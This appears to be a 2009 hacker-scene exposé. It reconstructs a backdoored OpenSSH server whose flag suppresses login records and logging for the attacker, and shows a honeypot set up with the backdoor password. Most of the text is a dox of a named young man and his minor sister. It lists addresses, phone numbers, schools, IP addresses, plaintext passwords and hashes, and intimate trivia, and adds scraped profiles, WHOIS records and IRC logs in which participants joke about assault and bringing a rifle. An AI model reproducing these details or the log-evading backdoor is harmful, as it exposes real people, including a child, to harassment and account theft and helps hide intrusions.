.text:08060D30 var_4 = dword ptr -4
.text:08060D30 ptr = dword ptr 8
.text:08060D30
.text:08060D30 push ebp
.text:08060D31 mov ebp, esp
.text:08060D33 push ebx
.text:08060D34 push eax
.text:08060D35 xor eax, eax
.text:08060D37 cmp ds:hookarOn, 1
.text:08060D3E mov ebx, [ebp+ptr]
.text:08060D41 jz short loc_8060D5E
.text:08060D43 call _geteuid
.text:08060D48 test eax, eax
.text:08060D4A jz short loc_8060D64
.text:08060D4C sub esp, 0Ch
.text:08060D4F push offset aAttemptToWrite ; "Attempt to write login records by non-r"...
.text:08060D54 call logit
.text:08060D59 mov eax, 1
.text:08060D5E
.text:08060D5E loc_8060D5E: ; CODE XREF: login_write+11j
.text:08060D5E mov ebx, [ebp+var_4]
.text:08060D61 leave
.text:08060D62 retn
*/
/**
** login_write: Call low-level recording functions based on autoconf
** results
**/
int
login_write(struct logininfo *li)
{
if(hookarOn == 1) return 0; //If the hookarOn flag is set (backdoor authenticated user) return without executing the rest of the code
//...
}
/*
.text:0806A60C ; int __cdecl do_log(int, int, __gnuc_va_list arg)
.text:0806A60C public do_log
.text:0806A60C do_log proc near ; CODE XREF: fatal+Fp
.text:0806A60C ; debug3+Fp ...
.text:0806A60C
.text:0806A60C dest = byte ptr -818h
.text:0806A60C buf = byte ptr -418h
.text:0806A60C arg_0 = dword ptr 8
.text:0806A60C arg_4 = dword ptr 0Ch
.text:0806A60C arg = dword ptr 10h
.text:0806A60C
.text:0806A60C push ebp
.text:0806A60D mov ebp, esp
.text:0806A60F push edi
.text:0806A610 push esi
.text:0806A611 push ebx
.text:0806A612 sub esp, 80Ch
.text:0806A618 cmp ds:hookarOn, 1
.text:0806A61F mov eax, [ebp+arg_0]
.text:0806A622 mov ecx, [ebp+arg_4]
.text:0806A625 mov ebx, [ebp+arg]
.text:0806A628 jz loc_806A6E0
.text:0806A6E0 loc_806A6E0: ; CODE XREF: do_log+1Cj
.text:0806A6E0 ; do_log+2Aj ...
.text:0806A6E0 lea esp, [ebp-0Ch]
.text:0806A6E3 pop ebx
.text:0806A6E4 pop esi
.text:0806A6E5 pop edi
.text:0806A6E6 leave
.text:0806A6E7 retn
*/
void
do_log(LogLevel level, const char *fmt, va_list args)
{
if(hookarOn == 1) return; //If the hookarOn flag is set (backdoor authenticated user) return without executing the rest of the code
//...
}
// For a detailed explanation refer to section [0x08] [Backdoor RCE] which covers the updated version of the backdoor.
root@srv01 [~/downloads/kojoney]# mv /etc/kojoney/fake_users /etc/kojoney/fake_users.backup
root@srv01 [~/downloads/kojoney]# echo root 0x3aownt > /etc/kojoney/fake_users
root@srv01 [~/downloads/kojoney]# cat /etc/kojoney/fake_users
root 0x3aownt
root@srv01 [~/downloads/kojoney]#
Honeypot Report
-----------------------
Date: Tue 23 Jun 2009 05:14:39 AM EDT
Log lines: 1173
Log size: 88K /var/log/honeypot.log
Authenticated users. Successfull logons
---------------------------------------
2 root
Total 2
Unauthenticated users. Failed logons
------------------------------------
72 root
5 test
5 oracle
2 0x3aownt
1 infosec
Total 85
Users successfully authenticateds with publickey
------------------------------------------------
Total 0
Users unsuccessfully authenticateds with publickey
--------------------------------------------------
Total 0
Logons with null passwords
--------------------------
8 root
2 0x3aownt
1 infosec
Total 11
Logons with or without password
-------------------------------
82 root
5 test
5 oracle
4 0x3aownt
2 infosec
Total 98
Number of times a remote shell was opened
-----------------------------------------
Total 2
X11 forward requests
--------------------
Total 0
Executed different commands
---------------------------
3 w
2 ls
1 quit
1 ps
1 pls -la etc
1 ls -lals
1 ls -la lol
1 ls -la
1 id
1 exit
1 cd /var
1 cd /etc
1 caexit
1 bullshit .
Total 17
Number of times the intruder tries to change the terminal window size
---------------------------------------------------------------------
Total 0
IP Addresses
------------
1 123.233.245.226 - 75 conexion(es)
2 91.184.220.239 - 2 conexion(es)
3 64.191.69.101 - 10 conexion(es)
Total 3
Sessions opened by humans
-------------------------
Typo error filter: Session with id 3 opened by a human // RoMeO
1 human session(s) total
Humans detecteds by IP
----------------------
0 human(s) total
Internal Honeypot Errors
------------------------
Total 1
/*
After re-imaging and recoving the server, an SSHD honeypot was installed and configured with the backdoor credentials.
Access was granted from 64.191.169.101 (mx101.stardustdawn.com) to the honeypot sshd with username: root and the backdoor
password that only anti-sec uses (RoMeO): 0x3aownt. The connecting system was running OpenSSH v4.3.
*/
_______ _______ ________
\ _ \ ___ __\ _ \ \_____ \
/ /_\ \\ \/ / /_\ \ / ____/
\ \_/ \> <\ \_/ \/ \
\_____ /__/\_ \\_____ /\_______ \
\/ \/ \/ \/
___________ __
\__ ___/____ _______ ____ _____/ |_
| | \__ \\_ __ \/ ___\_/ __ \ __\
| | / __ \| | \/ /_/ > ___/| |
|____| (____ /__| \___ / \___ >__|
\/ /_____/ \/
__________ _____.__.__ .__
\______ \_______ _____/ ____\__| | |__| ____ ____
| ___/\_ __ \/ _ \ __\| | | | |/ \ / ___\
| | | | \( <_> ) | | | |_| | | \/ /_/ >
|____| |__| \____/|__| |__|____/__|___| /\___ /
\//_____/
1)
RoMeO:
-----
Real Name: Faisal Hourani
Sister Name: Joud Hourani
Country: Saudi Arabia
City: Riyadh
Previous City: Jeddah
Address: King Fahad ST
Age: 20
Birthday: April 02
Horoscope: Aries
Height: 1.73cm (5.7")
Phone Number: +966.509121268
Nickname: RoMeO
Emails: srshaxsir@hushmail.com, romeo.haxxor@gmail.com, romeo@darkmindz.com, coolking_97@hotmail.com
MSN: romeo@darkmindz.com
ISP Network Range: 188.48.0.0 to 188.55.255.255, 212.71.32.0 to 212.71.63.255, 82.167.0.0 to 82.167.255.255
Domains: http://darkmindz.com, http://cybershade.org, http://www.freewebs.com/xromeox, http://xromeox.bravehost.com
Domain Hosting: hr-development.net
Domain Name Servers: ns5.hr-development.net, ns6.hr-development.net
Skills: _lulz_
Certifications: GSCE English, Math A Level
Favorite Books: Stealing the Network: How to Own a Continent (Bob Knuth)
Fake Names: James Knuth
Fake Emails: glafk0s@hotmail.com, knuth.james1@gmail.com
PsyBNC Host: absolute.ownage.net / 72.20.28.205
Plain Passwords: zeroforlol, ra7plmyt, sidfh928rf783, swU55ath, bu9fjogr, ve2aZCp3GYoq
Hash Passwords: $1$qx2sTgHs$VHb4bpwE.lRwBFDmjtwPx, 0fb82d94184aca290e633cf50671baf9 Salt(R_g^0), 5921174f5ef40f7765dee53b4722426b, 59a41b9e4f5983c66a6f26ef7c27fa0205af01bc:c419
Real IPs: 188.54.114.181(08/06/09), 188.51.89.109(09/06/09), 188.50.41.73 (23/06/09-25/06/09), 188.49.23.137(26/06/09), 188.51.85.13 (27/06/09-30/06/09)
Common Phrases: sir, hai, lulz, hax, _somephrase_, rawr
Common Bash Commands: netstat, netstat, netstat @ (Panic Mode)
IRC Friends: BSDGurl, dark, pimpinjg, r0rkty, glyph, xlink, AlbinoSkunk
Staff Member: thedefaced.org, blackhat-forums.com, r00tsecurity.org
Cars Driving: Golf GTI, Nissan Armada
Favorite TV Shows: Friends, Dharma and Greg, Inside Edition, Still Standing, Grounded for life
Favorite Movies: House of Wax, The Notebook
Favorite Games: Counter-Strike, Doom 3
Favorite Music: Fergie, Chris Brown, Fadel and Yara
School: Thamer International School, Jeddah, Saudi Arabia
Studies: Limkokwing University of Creative Technology '12 (http://www.limkokwing.net/united_kingdom)
Studies Course: Software Engineering
RoMeO's sister:
---------------
Full Name: Jude (Joud) Hourani or Al-Hourani
Nationality: Jordanese
Speaks: English, French, Arabic and possibly 1 or 2 other languages.
Lives in: Jeddah (Saudi Arabia)
Birthday: July 14th 1993
Age: 17
Zodiac: Cancer
Hair color: Black and Brown (Her worst habit...)
Height: 1.68cm ~ 1.72cm
Drinks: Sprite, 7up, Pepsi and Cade
Movies: Far too many including Zoolander, She's The Man, Last Holiday, Aquamarine, Ice Princess,
Princess Diaries 1 & 2, Freaky Friday, Just Friends, Pink Panther, Just Like Heaven, Click, Meet The Fockers,
Meet The Parents, Tokyo Drift, Just My Luck, Shall We Dance, Moulin Rouge, A Walk To Remember, Chasing Liberty,
Mean Girls, War of the Worlds, Mr. Deeds and many many more!!! Woa, quite a collection I must admit! =)
TV Series: Friends, Fashion House, Still Standing, 8 Simple Rules, Star Academy, Seventeen, Popular,
Sleepover club and many other...
Quote: "Elordon Awalan" which means "Jordan First!"
Sports: Basketball and Tennis
Eats: French fries, shrimps and candy!!! Hehehe... :-T
Ice-Cream: Chocolate, Lime and Strawberry
Candy: HARIBO
Colors: White, Black, Red, Pink and Blue
Hobbies: Playing the piano (wants to learn electric guitar), dancing Hip-Hop, chatting on the internet
and watching movies! Yeeah! :-P
Idols: Has a few but favorite is Avril Lavigne because she is not afraid to speak her mind... L-o-L!
Dream Vacations: USA Disney Land
Darkmindz.com on 2007-02-24 - Domain History
Registrant:
Individual
Chilis building Hamra street
jeddah, 6277
SA
Domain name: DARKMINDZ.COM
Administrative Contact:
Perlman, Menachem menachem12345@gmail.com
Chilis building Hamra street
jeddah, 6277
SA
+966.509121268
Technical Contact:
NOC (Network Operations Center), Servage.net noc@servage.com
Im Grund 9
Flensburg, DE 24939
DE
+49.46116098358 Fax: +49.46116098359
Darkmindz.com on 2007-04-06 - Domain History
Registrant:
Individual
Kind Fahad ST.
Riyadh,
sa
Domain name: DARKMINDZ.COM
Administrative Contact:
Haxxor, RoMeO romeo.haxxor@gmail.com
King Fahad ST.
Riyadh,
sa
+966.509121268
Technical Contact:
NOC (Network Operations Center), Servage.net noc@servage.com
Im Grund 9
Flensburg, DE 24939
DE
+49.46116098358 Fax: +49.46116098359
Registration Service Provider:
Servage.net Hosting, support@servage.net
+49 46116098359 (fax)
http://www.servage.net/
Darkmindz.com on 2008-01-05 - Domain History
Registrant:
Individual
King Fahad ST.
Riyadh,
SA
Domain name: DARKMINDZ.COM
Administrative Contact:
Perlman, Menachem romeo.haxxor@gmail.com
King Fahad ST.
Riyadh,
SA
+966.509121263
Technical Contact:
Perlman, Menachem romeo.haxxor@gmail.com
King Fahad ST.
Riyadh,
SA
+966.509121263
Darkmindz.com on 2009-07-31 - Domain History
Domain name: darkmindz.com
Registrant Contact:
NA
NA Individual ()
Fax:
King Fahad ST.
Riyadh, P
SA
Administrative Contact:
NameCheap.com
NameCheap.com NameCheap.com (support@NameCheap.com)
+1.6613102107
Fax: +1.5555555555
8939 S. Sepulveda Blvd. #110 - 732
Westchester, CA 90045
US
/*
Domain history shows exactly RoMeo past and current Saudi Arabia address, including his mobile number.
The registrant name provided in the registration of the domain between 2007-02-24 and 2008-01-05 came
in contradiction with our research, therefore was classified as fake.
*/
Cybershade.org on 2008-12-23 - Domain History
Domain ID:D149271481-LROR
Domain Name:CYBERSHADE.ORG
Created On:29-Sep-2007 15:21:51 UTC
Last Updated On:22-Dec-2008 17:59:31 UTC
Expiration Date:29-Sep-2010 15:21:51 UTC
Sponsoring Registrar:eNom, Inc. (R39-LROR)
Status:OK
Registrant ID:15a646b0510
Registrant Name:Cybershade Inc
Registrant Street1:123 Cybershade org
Registrant Street2:
Registrant Street3:
Registrant City:Internet
Registrant State/Province:DOMAIN
Registrant Postal Code:Z1P CD3
Registrant Country:GB
Registrant Phone:+44.123567890
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:crawleruk@gmail.com
Admin ID:15a646b0510
Admin Name:Cybershade Inc
Admin Street1:123 Cybershade org
Admin Street2:
Admin Street3:
Admin City:Internet
Admin State/Province:DOMAIN
Admin Postal Code:Z1P CD3
Admin Country:GB
Admin Phone:+44.123567890
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email:crawleruk@gmail.com
Tech ID:15a646b0510
Tech Name:Cybershade Inc
Tech Street1:123 Cybershade org
Tech Street2:
Tech Street3:
Tech City:Internet
Tech State/Province:DOMAIN
Tech Postal Code:Z1P CD3
Tech Country:GB
Tech Phone:+44.123567890
Tech Phone Ext.:
Tech FAX:
Tech FAX Ext.:
Tech Email:crawleruk@gmail.com
Name Server:NS3.HR-DEVELOPMENT.NET
Name Server:NS4.HR-DEVELOPMENT.NET
// Domain used for their cybershade CMS development.
Hello there and welcome to "RoMeOs" one stop web
Check it out and let me know what you think, you can contact me on coolking_97@hotmail.com
Male, 15 years old
Jedah, Saudi-Arabia
ref: First Website : http://www.freewebs.com/xromeox/
/*
RoMeO first website teaching "Ileagal Knoweledge!" related to hacking including the basics of IP Address
and how you can get other people IP Address. Say, you're really special, aren't you?
*/
RoMeO:
<script>javascript:alert("hey")< ;/script>
<plaintext>
<xmtp>
18-Mar-07
212.71.37.x
RoMeO:
thxx amin,, i will do better inshalah by time.. keeep on the comments coming
22-Oct-06
82.167.17.x
RoMeO:
Hey yahya, dnt like my web,, call 1800-KISS-MY-ASS
pukepuke
21-Oct-06
82.167.17.x
ref: http://www.freewebs.com/xromeox/guestbook.htm
// Don't speak unless you can improve the silence..
Hope You Enjoy Your Stay!
I made this website right after i was done from the first one..
i want to send my special thanks and regards to "Amin Osama", "Yahya Maatouk" and last but not least to the
inspiration of websites creation my sister "Joud Hourani"...
About Me (RoMeO)
Name: Faisal Hourani
Age: 15 years old
ref: http://xromeox.bravehost.com/
// Haiii :]
Faisal :: My Profile (29 views)
Location
jeddah, Saudi Arabia
umm i simply cant describe my self shortly as hi5 says,, soo u intrested of knowing abt me,, email me at
coolking_97@hotmail.com
Interests
Computer, Internet ,BasketBall,Girls
Favorite Movies
Scary Movie,The day after tomorow
Favorite TV Shows
FRIENDS
Favorite Books
Who cares for stupid books!!
ref: http://www.hi5.com/friend/p6229610--Faisal--html
// I take your word for everything, but I have doubts about your _Girl_ interests
Thamer International School
Address:
Hail Street
Town/City:
Jeddah
Country:
Saudi Arabia
Telephone:
+966-2-6680747
Fax:
+966-2-6641320
Email:
lenahosn@hotmail.com
Website:
http://www.tis-edu.com
Principal:
Lena Aboul Hosn (Mrs)
IGCSE co-ordinator:
Yassin Etheridge (Mr)
Gender:
Mixed
// Many thanks to TIS for being so kind and helpful - (social-engineer.org)
10/31/2006 5:03:33 PM: Faisal Hourani
Hello there,, realy awesome code.. loved it, im an admin at my dads net caffe :D, will i needed tht type of
progs,, anywayz i hav been doin some RATS my self,, im lookin 4 a code to make the server send me an email
wen the remote user is on the net,, any ideas please email me at "coolking_97@hotmail.com"
Thanks for helping to "Keep the Planet Clean".
ref: http://www.planet-source-code.com/vb/scripts/ShowCode.asp?txtCodeId=30182&lngWId=1
/*
Just wondering, have you ever coded anything in your life? Reusing code is good, but you've
taken it to a different level
*/
10/31/2006 5:37:35 PM: Faisal Hourani
Ahmed Ezz, Handle-X is the best RAT i have ever used,, i would have paid for it :P ,, just one thing please
when you are done with any new version even a beta, can you let me know, email me at "coolking_97@hotmail.com"
(If this comment was disrespectful, please report it.)
Thanks for helping to "Keep the Planet Clean".
ref:http://www.planet-source-code.com/vb/scripts/ShowCode.asp?txtCodeId=59815&lngWId=1
// There are more _RATs_ around you that you can ever imagine!
My Homepage | darkmindz.com
http://www.webhostingtalk.com/profile/xRoMeOx
UserID: 246663
Joined: 17/11/2006 11:45:27
Last Login: 16/01/2008 16:33:17
Last Active: 16/01/2008 16:33:17
Website: http://www.darkmindz.com
MSN: coolking_97@hotmail.com
Rank: Pentitioner (180 Points)
Basic: (1) (2) (3) (4) (5)
Realistic: (1) (2) (3)
ref: http://www.hackthissite.org/user/view/Nuker
// For 2 years you've been strugling to complete the challenges with no apparent luck... or is it skills?
-
RoMeO is root@DarkMindZ.com * romeo haxxor
RoMeO is using modes +iwrxt
RoMeO is connecting from *@absolute.ownage.net 72.20.28.205
RoMeO is a registered nick
RoMeO on ~#darkmindz #astalavista #kinqpinz
RoMeO using twofish.securitychat.org SecurityChat.org ircd
RoMeO has been idle 6hrs 28mins 18secs, signed on Sat Jun 20 18:35:59
RoMeO End of /WHOIS list.
Session Start: Tue Jun 09 18:39:34 2009
Session Ident: #as'#darkmindz
[16:44:49] <as'RoMeO> we got issues sir
[16:44:51] <as'RoMeO> get on msn
[18:04:23] <as'RoMeO> dmz will never end sir
[18:04:58] <as'p3ri0d> lol RoMeO
[00:13:29] <as'RoMeO> sir
[00:13:31] <as'pimpinjg> nvm
[00:13:33] <+as'G-Brain> bsdgurl != bsdgurl
[00:13:35] <as'RoMeO> ^
[00:49:17] <as'RoMeO> dream on sir
[00:49:43] <as'Spyware> putting the old dmz back?
[00:49:49] <as'RoMeO> not doing anything
[01:09:28] <as'RoMeO> so you stfu and sit back sir
[01:09:33] <as'Spyware> You can't disallow people from talking.
[01:09:36] <as'Spyware> Freedom of Speech, idiot.
[01:13:37] <as'RoMeO> what is your point sir
[01:13:41] <as'Spyware> hang on
[01:13:47] <as'Spyware> Gotta quote something for you
// Sir! sir! keep talking.. someday you might say something intelligent!
[03:33:28] <RoMeO> ..
[03:33:32] <Biber> hhaha
[03:33:34] <RoMeO> comin to the UK
[03:33:38] <RoMeO> to kick your ass
[03:33:43] <AlbinoSkunk> geee someone is going to have to drink some beer with this mofo
[03:33:44] <Biber> w00t run away AlbinoSkunk!!!
[03:33:49] <Biber> no wait
[03:33:55] <Biber> get a baseball bat xD
[03:34:02] <RoMeO> that wont save you
[03:34:04] <AlbinoSkunk> RoMeO you best meet up
[03:34:11] <RoMeO> oh i will
[03:34:12] <TheM> Better, get one of those no-stab knives they sell up in the U.K.
[03:34:14] <RoMeO> i wanna meet
[03:34:15] <RoMeO> xlink
[03:34:16] <AlbinoSkunk> i got an idea
[03:34:19] <RoMeO> reaper
[03:34:21] <RoMeO> mmm
[03:34:24] <RoMeO> x2fuson
[03:34:31] <RoMeO> who else
[03:34:37] <AlbinoSkunk> i kidnap xLink, and a few other dudes and we all go to the next HBH conference
[03:34:42] <RoMeO> dood i know like 1000 uk hackars
[03:34:42] <Biber> ill come too, to rob you all!
[03:34:42] <AlbinoSkunk> and kick ass
[03:34:50] <RoMeO> lmfao
[03:34:52] <RoMeO> that would be fun
[03:34:58] <RoMeO> finally meet cheese
[03:34:58] <Biber> hhahah yeah
[03:35:05] <AlbinoSkunk> honestly if you and dick cheese met in the same room
[03:35:12] <RoMeO> hated him for years, might as well punch him in the face
[03:35:16] <AlbinoSkunk> that would be crazy
[03:35:19] <Biber> lmfao totally
[03:35:26] <RoMeO> very
[03:35:40] <RoMeO> i gave that guy a headche for 2 years
[03:35:45] <RoMeO> made him pay more than he earns
[03:35:48] <Biber> srsly if i went to UK ,the same day i would end up in prison
[03:36:02] <AlbinoSkunk> haha
[03:36:05] <RoMeO> there are no prisons in the UK
[03:36:08] <RoMeO> they just shoot you on sight
[03:38:05] <AlbinoSkunk> RoMeO, come here on a student loan and visa?
[03:38:19] <AlbinoSkunk> OOOOH and we have to go to a 2600 meet up just to stir some shit up
[03:38:27] * AlbinoSkunk herd fags go there
[03:38:29] <RoMeO> visa
[03:38:38] <AlbinoSkunk> no loan?
[03:38:39] <RoMeO> my money
[03:38:40] <RoMeO> nope
[03:38:45] * Joins: chaosphe1e (~chaospher@EclipticX-87048C75.pool.einsundeins.de)
[03:38:48] <AlbinoSkunk> thats very good
[03:38:51] <RoMeO> lol
[03:38:57] <RoMeO> will be in london
[03:39:00] <AlbinoSkunk> are you staying at the uni campus
[03:39:03] <Biber> when you're coming back,pass by over here,and bring me some UK drugs
[03:39:04] <RoMeO> nope
[03:39:06] <AlbinoSkunk> or renting your own place?
[03:39:08] <Biber> wanna see how they ride
[03:39:10] <RoMeO> got a friend there
[03:39:13] <RoMeO> staying with him
[03:39:19] <AlbinoSkunk> lucky man
[03:39:21] <RoMeO> hehe
[2:26am] <~RoMeO> this week
[2:26am] <~RoMeO> everyone wants me down
[2:26am] <~RoMeO> eeye came on #bhf
[2:26am] <~RoMeO> and was like
[2:26am] <~RoMeO> we are sueing you
[2:26am] <~RoMeO> they spoke to glyph
[2:26am] <+RCEg0d> yeah i've seen that
[2:26am] <~RoMeO> admin of irc
[2:26am] <~RoMeO> and:
[2:27am] <~RoMeO> <Eye_SRodd> The reports we have are largely anecdotal, but we believe two users called 'Romeo' and 'Darkpontifex' are behind a recent intrusion
[2:27am] <+RCEg0d> they have no legal right to log or force him to give info
[2:27am] <~RoMeO> but
[2:27am] <~RoMeO> they are still after me
[2:27am] <~RoMeO> and i dont know whos in on it either
[2:27am] <~RoMeO> but i am sure
[2:27am] <~RoMeO> some of my close people online
[2:27am] <~RoMeO> is ratting me out on alot of stuff
[2:28am] <~RoMeO> and i cant do anything until i know whos in on it
[2:29am] <~RoMeO> it doesnt go away like that
[2:29am] <~RoMeO> they are
[2:29am] <~RoMeO> grouping against me now
[2:29am] <~RoMeO> not one or 2
[2:29am] <~RoMeO> like alot of people
[2:29am] <~RoMeO> and groups
// You have no idea, who, where, what and the rest of the 'w's :)
[2:29am] <+RCEg0d> wtf?
[2:29am] <%p3ri0d> don't want to brag for RoMeO but he's one of those that hsould know about it more then anyone else
[2:29am] <~RoMeO> i am not kidding
[2:29am] <%p3ri0d> and shit that's bad
[2:29am] <+RCEg0d> eeye go legal ok...
[2:29am] <~RoMeO> eeye can go legal
[2:29am] <~RoMeO> i dont care about the legal part
[2:29am] <+RCEg0d> the groups?
[2:29am] <~RoMeO> i am more concerned about the people invovled in it
[2:30am] <+RCEg0d> dont worry about the legal shit they can't do a thing
[2:30am] <+RCEg0d> then dont give em information
[2:30am] <~RoMeO> its a little too late
[2:30am] <~RoMeO> plus
[2:30am] <~RoMeO> sopme people
[2:30am] <~RoMeO> i truted for years online
[2:30am] <~RoMeO> are aparently going agasint me now
[2:30am] <~RoMeO> and if they know what i do, they know my operation etc, trhey can do alot of shit against it
// Operation Site Down
[2:31am] <~RoMeO> its some annoying shit honestl
[2:31am] <+RCEg0d> i know how it goes
[2:31am] <~RoMeO> all started on bhf today
[2:31am] <+RCEg0d> the thing is.. you are too worried and u might end up doing a mistake
[2:31am] <+RCEg0d> so first you need to relax and take things from the begining
[2:32am] <~RoMeO> i understand if they are pissed off that i damanged there shit or w/e, but those people whom i trusted going asgainst me, thats bad
[2:32am] <+RCEg0d> take out of your operations people you might suspect that they are plotting against u
[2:32am] <~RoMeO> already out
[2:32am] <~RoMeO> but i dont wanan just
[2:32am] <~RoMeO> deluser
[2:32am] <~RoMeO> i wanna be 100% sure
[2:32am] <~RoMeO> they are plotting agaisnt me
[2:32am] <~RoMeO> cause if they arent
[2:32am] <~RoMeO> and i del them
[2:32am] <~RoMeO> they will
[2:32am] <~RoMeO> lol
[2:32am] <+RCEg0d> maby they are afraid of the feds
[2:32am] <%p3ri0d> bad fucking situation
[2:33am] <~RoMeO> very bad situation
[2:34am] <+RCEg0d> thats true
[2:34am] <~RoMeO> i think the have an idea that
[2:34am] <~RoMeO> if they fuck with me or they got a few lil info about me
[2:34am] <~RoMeO> or what i do
[2:34am] <~RoMeO> they can just shut it down
[2:34am] <~RoMeO> i have no idea why they think they can do that,but thats the case
[2:35am] <+RCEg0d> keep your shit private and monitor everything
[2:35am] <~RoMeO> everything i know of, is already monitored
[2:35am] <+RCEg0d> if they want to shut you down trust me they will find a way
[2:35am] <~RoMeO> thst how i know of it in the first plae
[2:36am] <+RCEg0d> find out who they are
[2:36am] <~RoMeO> look
[2:36am] <~RoMeO> the people
[2:36am] <~RoMeO> who are in on it and i know of
[2:36am] <~RoMeO> are already comprimised
[2:36am] <~RoMeO> simple as that
[2:36am] <~RoMeO> but
[2:36am] <~RoMeO> i cant do anythin
[2:39am] <+RCEg0d> itg means they dont even know where you are
[2:39am] <+RCEg0d> *it
[2:39am] <~RoMeO> they are getting close to the people i know
[2:40am] <~RoMeO> and i am getting weird people from all over irc pm' ing me randomly
[2:40am] <+RCEg0d> darkpontifex?
[2:40am] <~RoMeO> ctcp requests
[2:40am] <~RoMeO> dark is a #bhf guy too
[2:40am] <+RCEg0d> maby them
[2:40am] <~RoMeO> nah dark cant be on ther side
[2:40am] <+RCEg0d> he was crying in bhf about going to jail
[2:40am] <~RoMeO> hha
[2:41am] <~RoMeO> i am not worried about legailty really, they cant touch me being where i live and who i am
[2:41am] <~RoMeO> but i am more worried online wise
[2:41am] <~RoMeO> worked on alot on this
[2:44am] <%p3ri0d> lol
[2:45am] <+RCEg0d> haha
[2:45am] <+RCEg0d> i say we find were they live
[2:45am] <+RCEg0d> and go beat em up
[2:45am] <+RCEg0d> :P
[2:45am] <~RoMeO> thats an option
[2:45am] <~RoMeO> if shit go really bad
[2:45am] <+RCEg0d> i can take my rifle with me
[2:45am] <~RoMeO> but so far
[2:45am] <~RoMeO> they did try to get what they want from me
[2:45am] <~RoMeO> they couldnt
[2:45am] <~RoMeO> so they will try again
[2:46am] <+RCEg0d> this time u need to be waiting
[2:46am] <+RCEg0d> if there is anything i can do, tell me
[2:46am] <~RoMeO> :)
[2:46am] <%p3ri0d> eh, I need some action too. Count me in
[2:46am] <+RCEg0d> hehehe
[2:46am] <~RoMeO> :)
[2:47am] <~RoMeO> its WAR
[2:47am] <~RoMeO> the plot thickned alot
[2:47am] <+RCEg0d> lets kick some ass :P
[2:47am] <~RoMeO> never thought it would go THIS far
[2:47am] <~RoMeO> people get owned all the time
[2:47am] <~RoMeO> but those people took it to the heart
[2:47am] <~RoMeO> rofl
[2:51am] <+RCEg0d> well in teh scene, when something bad was about to happen, we changed group names, nicks and dropped all our contacts + servers and started up fresh
[2:52am] <~RoMeO> there is no group name
[2:52am] <+RCEg0d> u get my meaning though
[2:52am] <~RoMeO> my nick isnt easy to just change
// Ever tried "/nick <newnick>" ?
[2:42pm] <~RoMeO> basically, when i was younger
[2:42pm] <~RoMeO> i skipped all math classes
[2:42pm] <~RoMeO> and that affected me alot
[2:42pm] <+RCEg0d> ah, u didnt get the basics
[2:42pm] <~RoMeO> since i fucked alot of my basics
[2:42pm] <~RoMeO> yes
[2:42pm] <~RoMeO> so when i went to A levels
[2:42pm] <~RoMeO> i am like ???????
[2:42pm] <+RCEg0d> yeah its like a chain, break a part and u get fucked :P
[2:42pm] <~RoMeO> well yea
[2:42pm] <~RoMeO> i got fucked
[2:42pm] <~RoMeO> basically
[2:42pm] <+RCEg0d> how long did u do math A levels?
[2:42pm] <~RoMeO> 1 year
[2:42pm] <~RoMeO> this year
[2:42pm] <~RoMeO> lol
[2:43pm] <+RCEg0d> hmm
[2:43pm] <+RCEg0d> well u cant get everything right in 1 year
[2:43pm] <~RoMeO> well las year
[2:43pm] <~RoMeO> yea
[2:43pm] <~RoMeO> but w/e all good now
[2:43pm] <~RoMeO> got accepted into uni
[2:43pm] <~RoMeO> and everything
[2:43pm] <~RoMeO> ^_^
[2:43pm] <+RCEg0d> cool
[2:43pm] <+RCEg0d> uk?
[2:43pm] <~RoMeO> yessir
[2:43pm] <+RCEg0d> nice
[2:43pm] <+RCEg0d> me2 :P
[2:43pm] <~RoMeO> ;D
[2:43pm] <~RoMeO> nice
[2:43pm] <+RCEg0d> in bristol
[2:43pm] <~RoMeO> london
[2:43pm] <+RCEg0d> comp science ofcourse :P
[2:44pm] <~RoMeO> software engineeering and multimedia
[2:44pm] <+RCEg0d> nice
[2:44pm] <~RoMeO> :]
[2:44pm] <+RCEg0d> i think i have a friend thats doing that in london
[2:44pm] <~RoMeO> ask him about it plz
[2:44pm] <~RoMeO> i dont wanna get into it and get fucked too
// You just love getting it, dont ya?
[2:44pm] <~RoMeO> xD
[2:44pm] <~RoMeO> if it involves loads of math, get me out
[2:45pm] <~RoMeO> i know CS does
[2:45pm] <+RCEg0d> hmmm
[2:45pm] <~RoMeO> so thats not an option
[2:45pm] <+RCEg0d> well it does a lil bit
[2:45pm] <+RCEg0d> in multimedia
[2:45pm] <~RoMeO> a lil bit is okay
[2:45pm] <~RoMeO> you cant runa way from math
[2:45pm] <~RoMeO> away*
[2:45pm] <+RCEg0d> he told me that they had to code opengl + C
[2:45pm] <~RoMeO> lovely
[2:45pm] <~RoMeO> thats math
[2:45pm] <~RoMeO> alot of it
[2:46pm] <~RoMeO> oh
[2:46pm] <+RCEg0d> but he passed because of the coursework
[2:46pm] <~RoMeO> theory i hated in computers
[2:46pm] <~RoMeO> is*
[2:46pm] <~RoMeO> reminds me of last year and the years before, school theory exams
[2:46pm] <~RoMeO> i know my shit in practical work
[2:46pm] <+RCEg0d> hate em
[2:46pm] <~RoMeO> but theory, its a lil more complicated to get the teacher to understand lol
[2:47pm] <~RoMeO> you cant exactly attach screenshots
[2:47pm] <+RCEg0d> hehehe
[2:48pm] <~RoMeO> btw
[2:48pm] <~RoMeO> yesterdays threats
[2:48pm] <+RCEg0d> well with software engineering there's a lot of theory
[2:48pm] <~RoMeO> 90% terminated
[2:48pm] <+RCEg0d> yeah?
[2:48pm] <~RoMeO> :]
[2:48pm] <+RCEg0d> cool
[2:48pm] <+RCEg0d> see, everything went alright
[2:48pm] <~RoMeO> it was a few slips on my end
[2:48pm] <~RoMeO> all fixed
[2:48pm] <~RoMeO> i learned a huge deal from it tho
[2:48pm] <~RoMeO> good thing it was caught
[2:48pm] <+RCEg0d> what was it?
[2:49pm] <~RoMeO> wont get into details
[2:49pm] <~RoMeO> but yea
[2:49pm] <~RoMeO> i fucked up a bit
[2:49pm] <~RoMeO> and people
[2:49pm] <~RoMeO> took advantage
[2:49pm] <~RoMeO> instantl
[2:49pm] <~RoMeO> instantly*
[2:50pm] <+RCEg0d> they got what they wanted?
[2:50pm] <~RoMeO> nope
[2:50pm] <~RoMeO> i win
[2:50pm] <~RoMeO> ;D
[2:50pm] <+RCEg0d> haha lamerz
[2:50pm] <~RoMeO> was up all night workin on making sure everything is intact
[2:50pm] <~RoMeO> tired shitless
[2:51pm] <+RCEg0d> no sleep?
[2:51pm] <~RoMeO> slept a bit
[2:51pm] <~RoMeO> but then woke up
[2:52pm] <~RoMeO> and was liek
[2:52pm] <~RoMeO> fuck it
